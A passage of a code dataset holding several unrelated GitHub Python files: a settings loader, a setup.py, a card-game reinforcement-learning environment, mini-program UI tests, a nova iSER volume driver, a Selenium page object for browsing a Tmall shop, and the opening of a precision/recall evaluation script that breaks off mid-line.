+{"seq_id":"20972747640","text":"from enum import Enum\nfrom weather import WeatherServices\nimport os\nimport json\n\nclass Units(str, Enum):\n    IMPERIAL: str = \"imperial\"\n    METRIC: str = \"metric\"\n    SCIENTIFIC: str = \"scientific\"\n\nclass UnitsConversion():\n    @staticmethod\n    def ConvertTemp(base_unit, temp, target_unit):\n        if base_unit == Units.IMPERIAL:\n            if target_unit == Units.METRIC:\n                return (temp-32) * (5.0/9.0)\n            if target_unit == Units.SCIENTIFIC:\n                return (temp - 32) * (5.0 / 9.0) + 273.15\n        if base_unit == Units.METRIC:\n            if target_unit == Units.IMPERIAL:\n                return (temp * 9.0/5.0) + 32\n            if target_unit == Units.SCIENTIFIC:\n                return temp + 273.15\n        if base_unit == Units.SCIENTIFIC:\n            if target_unit == Units.IMPERIAL:\n                return (temp - 273.15) * (9.0/5.0) + 32\n            if target_unit == Units.METRIC:\n                return temp - 273.15\n        return temp\n\nclass Settings():\n    def __init__(self, settings_path):\n        self.temperature_units = Units.METRIC\n        self.temperature_variance = 2\n        self.temperature_target = 23.0\n        self.refresh_interval_ms = 5000\n        self.weather_service = WeatherServices.WEATHER_DOT_GOV\n        self.lat = 39.7456\n        self.lon = -97.0892\n        self._settings_path = settings_path\n\n    def load(self):\n        if not os.path.exists(self._settings_path):\n            self.save()\n\n        with open(self._settings_path, \"r\") as settings_file:\n            settings_dict = json.load(settings_file)\n            self.update_from_dict(settings_dict)\n\n    def save(self):\n        directory_path = os.path.dirname(self._settings_path)\n        if not os.path.exists(directory_path):\n            os.makedirs(directory_path)\n\n        settings_dict = self.to_dict()\n        with open(self._settings_path, \"w+\") as settings_file:\n            json.dump(settings_dict, settings_file, indent=6)\n\n    def to_dict(self):\n        settings_dict = {\n            \"temperature_units\": self.temperature_units,\n            \"temperature_variance\": self.temperature_variance,\n            \"temperature_target\": self.temperature_target,\n            \"refresh_interval_ms\": self.refresh_interval_ms,\n            \"weather_service\": self.weather_service,\n            \"lat\": self.lat,\n            \"lon\": self.lon\n        }\n        return settings_dict\n\n    def update_from_dict(self, settings_dict):\n        self.temperature_units = settings_dict[\"temperature_units\"]\n        self.temperature_variance = settings_dict[\"temperature_variance\"]\n        self.temperature_target = settings_dict[\"temperature_target\"]\n        self.refresh_interval_ms = settings_dict[\"refresh_interval_ms\"]\n        self.weather_service = settings_dict[\"weather_service\"]\n        self.lat = settings_dict[\"lat\"]\n        self.lon = settings_dict[\"lon\"]\n\nclass SettingsFactory():\n    @staticmethod\n    def create_settings(path):\n        settings = Settings(path)\n        settings.load()\n        return settings\n","repo_name":"FormerLurker/heat_battery","sub_path":"heat_battery/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
+{"seq_id":"31549076992","text":"import setuptools\n\nwith open('tensorfx/_version.py') as vf:\n  exec(vf.read())\n\nwith open('requirements.txt') as rf:\n  dependencies = rf.readlines()\n  dependencies = map(lambda d: d.strip(), dependencies)\n  dependencies = filter(lambda d: d and not d.startswith('#'), dependencies)\n\nsetuptools.setup(\n  name='tensorfx',\n  version=__version__,\n  packages=[\n    'tensorfx',\n    'tensorfx.data',\n    'tensorfx.training',\n    'tensorfx.prediction',\n    'tensorfx.tools',\n    'tensorfx.models',\n    'tensorfx.models.nn'\n  ],\n  entry_points={\n    'console_scripts': [\n      'tfx = tensorfx.tools.tfx:main'\n    ],\n  },\n  data_files=[('.', ['requirements.txt'])],\n  install_requires=dependencies,\n  author='Nikhil Kothari',\n  author_email='nikhilk@twitter',\n  url='https://github.com/TensorLab/tensorfx',\n  license=\"Apache Software License\",\n  description='TensorFX Framework for training and serving machine learning models with TensorFlow',\n  keywords=[\n    'TensorLab',\n    'TensorFlow',\n    'Machine Learning',\n    'Deep Learning',\n    'Google'\n  ],\n  classifiers=[\n    # https://pypi.python.org/pypi?%3Aaction=list_classifiers\n    'Development Status :: 3 - Alpha',\n    'Environment :: Other Environment',\n    'Intended Audience :: Developers',\n    'License :: OSI Approved :: Apache Software License',\n    'Programming Language :: Python',\n    'Programming Language :: Python :: 2.7',\n    'Operating System :: OS Independent',\n    'Topic :: Scientific/Engineering :: Artificial Intelligence',\n    'Topic :: Software Development :: Libraries',\n    'Topic :: Software Development :: Libraries :: Python Modules'\n  ]\n)\n","repo_name":"TensorLab/tensorfx","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","stars":196,"dataset":"github-code","pt":"48"}
+{"seq_id":"18457333","text":"\"\"\"\r\ndurak env for rlcard env\r\n\"\"\"\r\nfrom base64 import decode\r\nfrom matplotlib.pyplot import table\r\nimport numpy as np\r\nfrom collections import OrderedDict, Counter\r\n\r\nfrom rlcard.envs import Env\r\nfrom game import Game\r\nfrom base.durak2 import Card\r\n\r\nfrom functools import lru_cache\r\n\r\nimport os\r\nimport sys\r\nif \"PROJECT_PATH\" in os.environ:\r\n    # if not supporting virtualenv\r\n    sys.path.insert(0,os.environ['PROJECT_PATH'])\r\n\r\nDEFAULT_GAME_CONFIG = {\r\n        'game_num_players': 2,\r\n        'game_num_decks': 1,\r\n        'allow_step_back': False,\r\n        'seed': 1\r\n        }\r\nTOTAL_CARDS = 36\r\n\r\nclass DurakEnv(Env):\r\n    ''' DurakEnv Environment\r\n    '''\r\n\r\n    def __init__(self, config=DEFAULT_GAME_CONFIG):\r\n        ''' Initialize the durak environment\r\n        '''\r\n\r\n        self.name = 'durak'\r\n        self.game = Game()\r\n        super().__init__(config)\r\n        # TODO recalc state shape\r\n        self.state_shape = [[229], [229]]\r\n\r\n        # add special action\r\n        self.action_shape = [[TOTAL_CARDS+1] for _ in range(self.num_players)]\r\n\r\n    def _get_legal_actions(self):\r\n        ''' Get all legal actions for current state\r\n        Returns:\r\n            legal_actions (list): a list of legal actions' id\r\n        '''\r\n        legal_actions = self.game.state['actions']\r\n        \r\n        legal_actions = dict([ (compute_action_id(action), _one_hot(action) ) for action in legal_actions])\r\n        #print(legal_actions)\r\n        return legal_actions\r\n\r\n    def _decode_action(self,action_id):\r\n        ''' Action id -> the action in the game. 
Must be implemented in the child class.\r\n Args:\r\n action_id (int): the id of the action\r\n Returns:\r\n action (string): the action that will be passed to the game engine.\r\n '''\r\n return decode_action(action_id)\r\n \r\n\r\n def _extract_state(self, state):\r\n ''' Encode state\r\n Args:\r\n state (dict): dict of original state\r\n '''\r\n current_hand = _cards2array(state['hand'])\r\n others_hand = _cards2array(state['knownOpponentHand'])\r\n isAttacker = state['isAttacker']\r\n unseenCards = _cards2array(state['unseen'])\r\n table = _cards2array(state['table'])\r\n deckSize = state['deckSize']\r\n opponentHandSize = state['opponentHandSize']\r\n trumpSuit = _one_hot_index(state['trumpSuit'],4)\r\n trash = _cards2array(state['trash'])\r\n unseen = _cards2array(state['unseen'])\r\n\r\n obs = np.concatenate((current_hand,\r\n others_hand,\r\n [isAttacker],\r\n unseenCards,\r\n table,\r\n [deckSize],\r\n [opponentHandSize],\r\n trumpSuit,\r\n trash,\r\n unseen\r\n ))\r\n\r\n extracted_state = OrderedDict({'obs': obs, 'legal_actions': self._get_legal_actions()})\r\n extracted_state['raw_obs'] = state\r\n extracted_state['raw_legal_actions'] = [a for a in state['actions']]\r\n extracted_state['action_record'] = self.action_recorder\r\n return extracted_state\r\n \r\n def get_payoffs(self):\r\n ''' Get the payoffs of players. Must be implemented in the child class.\r\n Returns:\r\n payoffs (list): a list of payoffs for each player\r\n '''\r\n if self.game.winner_id is None:\r\n # should not happen\r\n return (0,0)\r\n payoffs = [0,0]\r\n payoffs[self.game.winner_id]=1\r\n return tuple(payoffs)\r\n \r\n\r\n def get_perfect_information(self):\r\n ''' Get the perfect information of the current state\r\n Returns:\r\n (dict): A dictionary of all the perfect information of the current state\r\n '''\r\n state = {}\r\n #state['hand_cards_with_suit'] = [self._cards2str_with_suit(player.current_hand) for player in self.game.players]\r\n state['hand_cards'] = [self.game.get_hand(0),self.game.get_hand(1)]\r\n # trace is table\r\n state['table'] = self.game.state['table']\r\n state['current_player'] = self.game.get_current_player()\r\n state['legal_actions'] = self.game.state['actions']\r\n return state\r\n\r\n def get_action_feature(self, action):\r\n ''' For some environments such as DouDizhu, we can have action features\r\n Returns:\r\n (numpy.array): The action features\r\n '''\r\n return _one_hot( decode_action(action) )\r\n\r\nCard2Column = {'3': 0, '4': 1, '5': 2, '6': 3, '7': 4, '8': 5, '9': 6, 'T': 7,\r\n 'J': 8, 'Q': 9, 'K': 10, 'A': 11, '2': 12}\r\n\r\nNumOnes2Array = {0: np.array([0, 0, 0, 0]),\r\n 1: np.array([1, 0, 0, 0]),\r\n 2: np.array([1, 1, 0, 0]),\r\n 3: np.array([1, 1, 1, 0]),\r\n 4: np.array([1, 1, 1, 1])}\r\n\r\n@lru_cache(maxsize=128)\r\ndef compute_action_id(action):\r\n if action.suit==-1:\r\n return 36\r\n action_id = action.suit*9+action.rank-6\r\n #print(action, action_id)\r\n return action_id\r\n\r\n@lru_cache(maxsize=128)\r\ndef decode_action(action_id):\r\n ''' Action id -> the action in the game. 
Must be implemented in the child class.\r\n Args:\r\n action_id (int): the id of the action\r\n Returns:\r\n action (string): the action that will be passed to the game engine.\r\n '''\r\n if (action_id==36):\r\n return Card(-1,-1)\r\n suit=action_id//9\r\n rank=action_id%9+6\r\n card = Card(suit,rank)\r\n return card\r\n\r\n@lru_cache(maxsize=128)\r\ndef _one_hot(card):\r\n # gets one card, returns one hot\r\n base = np.zeros((4,9), dtype=np.int8)\r\n has_special=[0]\r\n if card.suit == -1: # special card:\r\n has_special=[1]\r\n return np.concatenate([base.flatten('F'),has_special])\r\n base[card.suit][card.rank-6] = 1\r\n return np.concatenate([base.flatten('F'),has_special])\r\n\r\n@lru_cache(maxsize=128)\r\ndef _cards2array(cards):\r\n base = np.zeros((4,9), dtype=np.int8)\r\n has_special=[0]\r\n for card in cards:\r\n if (card.suit == -1):\r\n has_special=[1]\r\n else:\r\n base[card.suit][card.rank-6] = 1\r\n return np.concatenate([base.flatten('F'),has_special])\r\n\r\n\r\ndef _one_hot_index(index,max_vals):\r\n one_hot = np.zeros(max_vals,int)\r\n one_hot[index]=1\r\n return one_hot\r\n","repo_name":"maxmarsakov/durak-project","sub_path":"durak_rlcard/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":6447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41836239615","text":"from minium import ddt_class, ddt_case\nfrom base.test_base import TestBase\n@ddt_class()\nclass Testesfdetail(TestBase):\n \"\"\"\n 二手房详情页\n \"\"\"\n def setUp(self, true=None) -> None:\n # self.page_name = \"/esf/sell/pages/detail/detail?sellId=331233705\"\n self.page_name = \"/esf/sell/pages/detail/detail?sellId=344383365\"\n self.switch = true\n self.classname = self.__class__.__name__\n super(Testesfdetail, self).setUp()\n print(\"Testesfdetail setup\")\n\n def test_26_点击日照图(self):\n \"\"\"\n V6.39.X: 点击小区楼栋模块gif图\n \"\"\"\n self.find_element('view[class=\"pr sunlight\"]').tap()\n\n self.get_screenshot()\n self.verifyPageName('/page/newhouse/rizhaofenxi/rizhaofenxi')\n\n def test_27_日照IM(self):\n \"\"\"\n V6.39.X: 点击咨询楼栋详情\n \"\"\"\n self.find_element('view[class=\"center chat\"]').tap()\n\n self.delay(3)\n self.get_screenshot()\n\n def test_36_goto_photo_点击相册(self):\n \"\"\"\n 点击相册\n \"\"\"\n elms = self.page.get_element('view[id=\"banner\"]').get_element('banner').get_elements('view')\n elms[0].get_element('swiper').get_element('swiper-item').tap()\n self.delay(1)\n self.get_screenshot()\n\n def test_01_goto_fxk_点击放心看(self):\n \"\"\"\n 点击放心看\n :return:\n \"\"\"\n fxk = self.page.element_is_exists('view[class=\"pr between fangXinKan\"]')\n if fxk == True:\n e = self.page.get_element('view[class=\"pr between fangXinKan\"]')\n e.tap()\n self.delay(2)\n self.get_screenshot()\n else:\n print('没有放心看标签')\n\n def test_02_goto_collect_点击取消收藏(self):\n \"\"\"\n 点击收藏\n :return:\n \"\"\"\n e = self.find_element('view[class=\"pa center collect\"]')\n e.tap()\n self.get_screenshot()\n \"\"\"\n 取消收藏\n \"\"\"\n e1 = self.find_element('view[class=\"pa center collect\"]')\n e1.tap()\n self.get_screenshot()\n\n def delete_test_27_goto_share_点击分享(self):\n \"\"\"\n 点击分享\n :return:\n \"\"\"\n e = self.page.get_element('button[class=\"button\"]')\n e.tap()\n self.delay(5)\n #self.get_capture()\n self.get_screenshot()\n\n def test_03_goto_ckxq_点击查看详情(self):\n \"\"\"\n 点击查看详情\n :return:\n \"\"\"\n e = self.find_element('view[class=\"center check\"]')\n e.tap()\n self.get_screenshot()\n\n def test_04_goto_ygim_首付和月供咨询(self):\n \"\"\"\n 点击首付和月供咨询\n 
:return:\n \"\"\"\n e = self.page.get_element('text', inner_text=\"首付和月供咨询\")\n e.tap()\n self.get_screenshot()\n\n def test_05_goto_lcim_点击楼层咨询(self):\n \"\"\"\n 点击楼层咨询\n :return:\n \"\"\"\n e = self.page.get_element('text', inner_text=\"楼层咨询\")\n e.tap()\n self.get_screenshot()\n\n def test_06_goto_sfim_点击税费咨询(self):\n \"\"\"\n 点击税费咨询\n :return:\n \"\"\"\n e = self.page.get_element('text', inner_text=\"税费咨询\")\n e.tap()\n self.delay(3)\n self.get_screenshot()\n\n def test_07_goto_qcj_点击去出价(self):\n \"\"\"\n 点击去出价\n :return:\n \"\"\"\n e = self.find_element('view[class=\"pa bidBtn\"]')\n e.tap()\n self.delay(3)\n self.get_screenshot()\n\n def test_08_goto_xqzx_房源详情咨询(self):\n \"\"\"\n 点击咨询房源详情\n :return:\n \"\"\"\n e = self.find_element('view[class=\"center chat\"]/text', inner_text=\"咨询房源详情\")\n e.tap()\n self.get_screenshot()\n\n def test_09_goto_ckall_房源描述查看详情(self):\n \"\"\"\n 房源描述-查看详情\n :return:\n \"\"\"\n des = self.page.element_is_exists('text', inner_text='房源描述')\n if des == True:\n tog = self.page.element_is_exists('text', inner_text='查看全部')\n if tog == True:\n self.page.get_element('text', inner_text='查看全部').tap()\n self.delay(3)\n self.get_screenshot()\n self.delay(3)\n self.page.get_element('text', inner_text='收起').tap()\n self.delay(3)\n self.get_screenshot()\n self.delay(3)\n else:\n print('没有查看更多')\n else:\n print('没有房源描述模块')\n\n @ddt_case(\n 1, 2, 3, 4\n )\n def test_10_goto_rmim_点击热门咨询tab(self, value):\n \"\"\"\n 热门咨询(小区有停车位吗?,小区楼间距如何?,价格可以再优惠吗?,房子满五唯一吗?)\n :param value:\n :return:\n \"\"\"\n align_msg = self.page.get_elements('view[class=\"flex a_c msg\"]')\n msg_list = align_msg[value]\n msg_list.tap()\n self.delay(2)\n self.get_screenshot()\n\n def test_11_goto_xqckxq_小区查看详情(self):\n \"\"\"\n 点击小区-查看详情\n :return:\n \"\"\"\n e = self.find_element('view[class=\"flex a_c checkMore\"]/text', inner_text='查看详情')\n e.tap()\n self.delay(5)\n self.get_screenshot()\n\n def test_12_goto_xqxq_点击小区进入详情页(self):\n \"\"\"\n 点击小区,进入小区详情页\n :return:\n \"\"\"\n e = self.find_element('view[class=\"pr villageImg\"]')\n e.tap()\n self.delay(5)\n self.get_screenshot()\n\n def test_13_goto_cjmsg_咨询近期成交数据(self):\n \"\"\"\n 点击咨询近期成交数据\n :return:\n \"\"\"\n e = self.page.get_element('text', inner_text=\"咨询近期成交数据\")\n e.tap()\n self.get_screenshot()\n\n def test_14_goto_fjpg_点击房价评估(self):\n \"\"\"\n 点击房价评估\n :return:\n \"\"\"\n e = self.page.get_element('text', inner_text=\"房价评估\")\n e.tap()\n self.get_screenshot()\n\n def test_15_goto_fjzs_点击房价走势图(self):\n \"\"\"\n 点击房价走势图\n :return:\n \"\"\"\n e = self.page.get_element('view[class=\"trendCharts\"]')\n e.tap()\n self.delay(3)\n self.get_screenshot()\n\n def test_16_goto_txqfy_点击同小区房源详情页(self):\n \"\"\"\n 点击同小区房源,进入房源详情页\n :return:\n \"\"\"\n # 页面滚动到同小区房源区域\n self.page.scroll_to(1400, 500)\n self.delay(1)\n\n # 先获取所有item\n elm_items = self.page.get_elements('//view[@id=\"anchor_4\"]/view[@class=\"list\"]/view[@class=\"item\"]')\n\n if len(elm_items) == 0:\n print(\"没有同小区房源\")\n else:\n # 第一个item\n elm_first_item = elm_items[0]\n # 点击第一条房源\n elms = elm_first_item.get_element('sell_item').get_elements('view')\n elms[0].tap()\n self.get_screenshot()\n\n def test_17_click_prmap_点击周边配套(self):\n \"\"\"\n 点击周边配套\n :return:\n \"\"\"\n self.page.scroll_to(1550, 500)\n self.delay(1)\n try:\n self.page.get_element('map[class=\"map\"]').tap()\n self.delay(3)\n except:\n print('没有周边配套模块')\n\n self.get_screenshot()\n\n def test_18_goto_txq_全部同小区房源(self):\n \"\"\"\n 点击全部同小区房源\n :return:\n \"\"\"\n e = self.page.get_element('view[class=\"center 
moreHouses\"][data-type=\"2\"]')\n e.tap()\n self.delay(3)\n self.get_screenshot()\n\n def test_19_goto_cnxh_猜你喜欢进入房源详情页(self):\n \"\"\"\n 猜你喜欢,进入房源详情页\n :return:\n \"\"\"\n # 页面滚动到猜你喜欢区域\n self.page.scroll_to(1750, 500)\n self.delay(1)\n\n # 先获取所有item\n elm_items = self.page.get_elements('//view[@class=\"guessLike\"]/view[@class=\"list\"]/view[@class=\"item\"]')\n\n if len(elm_items) == 0:\n print(\"没有猜你喜欢房源\")\n else:\n # 第一个item\n elm_first_item = elm_items[0]\n # 点击第一条房源\n elms = elm_first_item.get_element('sell_item').get_elements('view')\n elms[0].tap()\n self.delay(3)\n self.get_screenshot()\n\n def test_20_goto_moreesf_点击更多二手房(self):\n \"\"\"\n 点击更多二手房\n :return:\n \"\"\"\n e = self.page.get_element('view[class=\"center moreHouses\"][data-type=\"2\"]')\n e.tap()\n self.delay(3)\n self.get_screenshot()\n\n def delete_test_21_goto_report_点击我要举报(self):\n \"\"\"\n 点击我要举报\n :return:\n \"\"\"\n self.page.scroll_to(1900, 500)\n self.delay(1)\n e = self.page.get_element('view[class=\"flex j_e report\"]')\n e.tap()\n self.get_screenshot()\n\n @ddt_case(\n 1, 2, 3, 4\n )\n def test_22_goto_asklayer_点击提问弹层及tab(self, value=3):\n \"\"\"\n 提问弹层()\n :param value:\n :return:\n \"\"\"\n self.find_element('view[class=\"questionCst--arrow questionCst--arrowUp\"]').tap()\n self.delay(1)\n self.find_element(f'//*[@id=\"questionCst\"]//view/view[1]/view[{value}]/view[1]').tap()\n self.delay(2)\n self.get_screenshot()\n\n def test_23_goto_broker_点击经纪人(self):\n \"\"\"\n 点击经纪人\n :return:\n \"\"\"\n # xpath定位\n elm = self.page.get_element('//view[@class=\"pf contact\"]/contact/view/view/view[1]')\n elm.tap()\n self.delay(5)\n self.get_screenshot()\n\n def test_24_goto_zxmsg_点击在线咨询(self):\n \"\"\"\n 点击在线咨询\n :return:\n \"\"\"\n # xpath定位\n elm = self.page.get_element('//view[@class=\"pf contact\"]/contact/view/view/view[2]/view[1]')\n elm.tap()\n self.delay(2)\n self.get_screenshot()\n\n def test_25_goto_tel_点击拨打电话(self):\n \"\"\"\n 点击拨打电话\n :return:\n \"\"\"\n # xpath定位\n elm = self.page.get_element('//view[@class=\"pf contact\"]/contact/view/view/view[2]/view[2]')\n elm.tap()\n self.get_screenshot()\n\n","repo_name":"gzsyr/tfminium","sub_path":"esf/test_esf_detail_二手房详情.py","file_name":"test_esf_detail_二手房详情.py","file_ext":"py","file_size_in_byte":10636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28564799127","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom os_brick.initiator import connector\nfrom oslo_config import cfg\n\nfrom nova import utils\nfrom nova.virt.libvirt.volume import iscsi\n\nvolume_opts = [\n cfg.IntOpt('num_iser_scan_tries',\n default=5,\n help='Number of times to rescan iSER target to find volume'),\n cfg.BoolOpt('iser_use_multipath',\n default=False,\n help='Use multipath connection of the iSER volume'),\n ]\n\nCONF = cfg.CONF\nCONF.register_opts(volume_opts, 'libvirt')\n\n\nclass LibvirtISERVolumeDriver(iscsi.LibvirtISCSIVolumeDriver):\n \"\"\"Driver to attach Network volumes to libvirt.\"\"\"\n def __init__(self, connection):\n super(LibvirtISERVolumeDriver, self).__init__(connection)\n\n # Call the factory here so we can support\n # more than x86 architectures.\n self.connector = connector.InitiatorConnector.factory(\n 'ISER', utils.get_root_helper(),\n use_multipath=CONF.libvirt.iser_use_multipath,\n device_scan_attempts=CONF.libvirt.num_iser_scan_tries,\n transport=self._get_transport())\n\n def _get_transport(self):\n return 'iser'\n","repo_name":"BU-NU-CLOUD-SP16/Trusted-Platform-Module-nova","sub_path":"nova/virt/libvirt/volume/iser.py","file_name":"iser.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"74556401106","text":"from uiautomation.pages.basepage import BasePage\nfrom uiautomation.common import Constants\nfrom uiautomation.elements import BasePageElement\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait # available since 2.4.0\nfrom selenium.webdriver.support import expected_conditions as EC # available since 2.26.0\nfrom selenium.webdriver.common.action_chains import ActionChains\nimport time\n\nclass Locators(object):\n dictionary = {\n # \"\"\"tmall shop page elements\"\"\"\n \"body\":(By.CSS_SELECTOR,\"html > body\"),\n \"search_bar\":(By.CSS_SELECTOR,\"#mq\"),\n \"search_all\":(By.CSS_SELECTOR,\"#J_SearchBtn\"),\n \"search_shop\":(By.CSS_SELECTOR,\"#J_CurrShopBtn\"),\n \"top1_product\":(By.CSS_SELECTOR,\"#J_ShopSearchResult > div > div.J_TItems > div:nth-child(1) > dl:nth-child(1)\"), \n \"top2_product\":(By.CSS_SELECTOR,\"#J_ShopSearchResult > div > div.J_TItems > div:nth-child(1) > dl:nth-child(2)\"), \n \"top3_product\":(By.CSS_SELECTOR,\"#J_ShopSearchResult > div > div.J_TItems > div:nth-child(1) > dl:nth-child(3)\"),\n \"next_page\":(By.CSS_SELECTOR,\"#J_ShopSearchResult > div > div.J_TItems > div.pagination > a.J_SearchAsync.next\"),\n \"popup_login_username\":(By.XPATH,\"//*[@id=\\\"TPL_username_1\\\"]\"),\n \"popup_login_password\":(By.XPATH,\"//*[@id=\\\"TPL_password_1\\\"]\"),\n \"popup_login_frame\":(By.CSS_SELECTOR, \"#J_sufei > iframe\"),\n \"popup_login_submit\":(By.CSS_SELECTOR, \"#J_SubmitStatic\")\n \n }\n\nclass BodyElement(BasePageElement):\n locator = Locators.dictionary[\"body\"]\nclass SearchBarElement(BasePageElement):\n locator = Locators.dictionary[\"search_bar\"]\nclass PopupLoginFrameElement(BasePageElement):\n locator = Locators.dictionary[\"popup_login_frame\"]\nclass PopupLoginSubmitElement(BasePageElement):\n locator = Locators.dictionary[\"popup_login_submit\"]\nclass PopupLoginUNElement(BasePageElement):\n locator = Locators.dictionary[\"popup_login_username\"]\nclass PopupLoginPWDElement(BasePageElement):\n locator = 
Locators.dictionary[\"popup_login_password\"]\nclass SearchAllElement(BasePageElement):\n locator = Locators.dictionary[\"search_all\"]\nclass SearchShopElement(BasePageElement):\n locator = Locators.dictionary[\"search_shop\"]\nclass NextPageElement(BasePageElement):\n locator = Locators.dictionary[\"next_page\"]\nclass Top1ProductElement(BasePageElement):\n locator = Locators.dictionary[\"top1_product\"]\nclass Top2ProductElement(BasePageElement):\n locator = Locators.dictionary[\"top2_product\"]\nclass Top3ProductElement(BasePageElement):\n locator = Locators.dictionary[\"top3_product\"]\n\nclass ShopPage(BasePage):\n search_bar_element = SearchBarElement()\n search_all_element = SearchAllElement()\n search_shop_element = SearchShopElement()\n top1_product_element = Top1ProductElement()\n top2_product_element = Top2ProductElement()\n top3_product_element = Top3ProductElement()\n next_page_element = NextPageElement()\n\n def search(self, keywords):\n WebDriverWait(self.driver, Constants.WAIT_TIME_SHORT).until(EC.visibility_of_any_elements_located(Locators.dictionary[\"body\"]))\n \n self._scrollDownAndUp()\n \"\"\"entering search keywords\"\"\"\n _search_bar = self.search_bar_element\n _keywords_chain_actions = ActionChains(self.driver)\n _keywords_chain_actions.move_to_element(_search_bar)\n _keywords_chain_actions.click(_search_bar)\n for c in list(keywords):\n _keywords_chain_actions.send_keys(c)\n _keywords_chain_actions.perform()\n\n \"\"\"click search button\"\"\"\n self.driver.element = self.search_shop_element\n self.driver.element.click() \n WebDriverWait(self.driver, Constants.WAIT_TIME_SHORT).until(EC.visibility_of_any_elements_located(Locators.dictionary[\"body\"]))\n self._scrollDownAndUp()\n return True\n\n def viewTop3Products(self):\n _top1_product = self.top1_product_element\n _top1_product_actions = ActionChains(self.driver)\n _top1_product_actions.move_to_element(_top1_product).key_down(Keys.CONTROL).click().key_up(Keys.CONTROL).perform()\n self._viewNewTabAndCloseAfter()\n\n _top2_product = self.top2_product_element\n _top2_product_actions = ActionChains(self.driver)\n _top2_product_actions.move_to_element(_top2_product).key_down(Keys.CONTROL).click().key_up(Keys.CONTROL).perform()\n self._viewNewTabAndCloseAfter()\n\n _tope3_product = self.top3_product_element\n _tope3_product_actions = ActionChains(self.driver)\n _tope3_product_actions.move_to_element(_tope3_product).key_down(Keys.CONTROL).click().key_up(Keys.CONTROL).perform()\n self._viewNewTabAndCloseAfter()\n return True\n\n def viewTopPages(self, number_of_pages):\n for i in range(number_of_pages):\n print(\"viewing page: \" + str(i+1))\n self.viewTop3Products()\n if i+1 == number_of_pages:\n continue\n self.driver.element = self.next_page_element \n self.driver.element.click()\n self.driver.switch_to_default_content() \n return True\n\n def _viewNewTabAndCloseAfter(self): \n self.driver.switch_to_window(self.driver.window_handles[-1])\n self._scrollDownAndUp()\n self.driver.close()\n self.driver.switch_to_window(self.driver.window_handles[-1])\n self.driver.switch_to_default_content()\n\n def _scrollDownAndUp(self):\n _scroll_step = Constants.SCROLL_STEP \n _scroll_interval = Constants.SCROLL_INTERVAL\n \"\"\"scroll down\"\"\" \n _last_height = self.driver.execute_script(\"return document.body.scrollHeight\")\n for h in range(int(_last_height/_scroll_step)):\n time.sleep(_scroll_interval)\n self.driver.execute_script(\"window.scrollTo(0,\" + str(_scroll_step*(h+1)) + \");\")\n \"\"\"scroll up\"\"\" \n 
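# re-read the page height, scroll back up in fixed steps, then jump to the very top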
_last_height = self.driver.execute_script(\"return document.body.scrollHeight\")\n for h in range(int(_last_height/_scroll_step)):\n time.sleep(_scroll_interval)\n self.driver.execute_script(\"window.scrollTo(0,\" + str(_last_height - _scroll_step*(h+1)) + \");\")\n self.driver.execute_script(\"window.scrollTo(0, 0);\")\n","repo_name":"fingerella2000/e2enuggets","sub_path":"uiautomation/pages/shoppage.py","file_name":"shoppage.py","file_ext":"py","file_size_in_byte":6340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33092763077","text":"import os\nimport argparse\nfrom typing import Dict, List, Tuple\nimport csv\nimport json\n\nimport numpy as np\nfrom tqdm import tqdm\n\nfrom improved_precision_recall import ManifoldEstimator, get_precision_and_recall, Manifold, PrecisionRecall\nfrom utilities import extract_from_filename, glob_filepaths\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('real_dir', type=str, help='Real features directory (load all npz files inside)')\n parser.add_argument('fake_dir', type=str, help='Fake features directory (load all npz files inside)')\n parser.add_argument('out_path', type=str, help='Path to output csv file')\n parser.add_argument('--recursive', '-r', action='store_true', help='Load features recursively from given directory')\n parser.add_argument('-k', type=int, default=3, help='K-value used for estimating the manifold to which the dataset belongs in the feature space (feature vectors closer than kth nearest neighbors of any dataset are approximated as belonging to the manifold)')\n parser.add_argument('--device', '-d', type=str, default='cuda', choices=['cuda', 'cpu'], help='Which device to use')\n parser.add_argument('--json', '-j', type=str, nargs='?', default=None, const='', help='Output json file')\n return parser.parse_args()\n\n\ndef main(opts):\n real_dir = os.path.abspath(opts.real_dir)\n real_files = glob_filepaths(real_dir, recursive=opts.recursive)\n real_manifold_dict = dict()\n classifier_set = set()\n\n estimator = ManifoldEstimator(k=opts.k, device=opts.device)\n\n print('Loading real features and estimating manifolds...')\n for f in tqdm(real_files):\n name, classifier = extract_from_filename(f)\n features = np.load(f)['features']\n real_manifold_dict[classifier] = estimator.evaluate(features)\n classifier_set.add(classifier)\n\n fake_dir = os.path.abspath(opts.fake_dir)\n fake_files = glob_filepaths(fake_dir, recursive=opts.recursive)\n # maps classifier name to a list of (name, manifold) pairs\n fake_manifold_list_dict: Dict[str, List[Tuple[str, Manifold]]] = dict()\n\n fake_name_set = set()\n\n print('Loading fake features and estimating manifolds...')\n for f in tqdm(fake_files):\n name, classifier = extract_from_filename(f)\n features = np.load(f)['features']\n manifold = estimator.evaluate(features)\n if classifier in fake_manifold_list_dict:\n fake_manifold_list_dict[classifier] += [(name, manifold)]\n else:\n fake_manifold_list_dict[classifier] = [(name, manifold)]\n fake_name_set.add(name)\n\n print('Evaluating Precision and Recall...')\n results = dict()\n classifiers = tqdm(real_manifold_dict.keys())\n classifiers.set_description('Total progress')\n for classifier in classifiers:\n real_manifold = 